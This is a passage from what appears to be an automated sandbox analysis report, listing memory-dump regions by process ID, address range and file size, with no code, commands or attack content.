                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2744-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2832-221-0x0000000002820000-0x0000000002821000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2832-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2832-210-0x0000000000860000-0x0000000000861000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2832-228-0x000000001B450000-0x000000001B452000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2860-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2872-333-0x0000000000620000-0x0000000000636000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3220-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3220-342-0x000000001B990000-0x000000001B992000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3240-276-0x0000000000030000-0x0000000000038000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3240-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3240-278-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3240-280-0x0000000000400000-0x0000000000437000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      220KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3252-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3348-664-0x0000000005360000-0x0000000005361000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3380-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3380-224-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-181-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-229-0x0000000006842000-0x0000000006843000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-444-0x0000000006843000-0x0000000006844000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-419-0x000000007E740000-0x000000007E741000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-222-0x0000000006840000-0x0000000006841000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-315-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-186-0x00000000001D0000-0x00000000001D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3444-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3480-387-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3480-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3480-423-0x0000000005950000-0x0000000005951000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3628-309-0x0000000000820000-0x0000000000821000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3628-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3628-330-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3732-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3744-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/3888-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4104-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4144-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4180-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4180-244-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-313-0x0000000004890000-0x0000000004891000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-287-0x00000000000B0000-0x00000000000B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-296-0x0000000002230000-0x0000000002231000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-310-0x0000000004880000-0x0000000004881000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4216-304-0x00000000048A0000-0x00000000048CD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      180KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4220-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4332-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-265-0x0000000005320000-0x0000000005321000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-256-0x0000000000418D3E-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-269-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-254-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-261-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-273-0x0000000005140000-0x0000000005746000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4336-263-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4352-710-0x00000000048D9000-0x00000000049DA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-138-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-143-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-132-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-141-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-134-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-133-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-136-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-137-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-135-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4436-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-241-0x0000000007D10000-0x0000000007D11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-394-0x000000007ECF0000-0x000000007ECF1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-185-0x0000000003270000-0x0000000003271000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-442-0x0000000006F43000-0x0000000006F44000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-223-0x0000000006F42000-0x0000000006F43000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-253-0x00000000082E0000-0x00000000082E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-220-0x0000000006F40000-0x0000000006F41000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-237-0x0000000007C70000-0x0000000007C71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-297-0x0000000003270000-0x0000000003271000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-201-0x0000000006F90000-0x0000000006F91000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-255-0x0000000008750000-0x0000000008751000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-243-0x0000000007D80000-0x0000000007D81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-245-0x0000000007F10000-0x0000000007F11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-207-0x0000000007600000-0x0000000007601000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4520-182-0x0000000003270000-0x0000000003271000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4548-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4576-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4596-678-0x00000214EF0D0000-0x00000214EF2F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      2.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4596-695-0x00000214F1103000-0x00000214F1105000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4596-696-0x00000214F1106000-0x00000214F1107000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4596-689-0x00000214F1100000-0x00000214F1102000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4596-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4620-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4644-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4648-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4660-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4688-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4732-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4732-338-0x0000000002900000-0x0000000002902000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4980-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4996-319-0x0000000000FC0000-0x000000000106E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4996-316-0x0000000000F70000-0x0000000000F80000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4996-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5024-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5028-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5092-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5100-399-0x0000000005740000-0x0000000005741000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5100-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5100-359-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5164-565-0x0000000004C70000-0x0000000004C71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5316-674-0x00000000048C0000-0x00000000048C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5452-607-0x0000000005470000-0x0000000005471000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5452-574-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5748-647-0x0000000002BC0000-0x0000000002BC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5748-624-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6016-651-0x0000000077580000-0x000000007770E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6016-676-0x00000000059D0000-0x00000000059D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB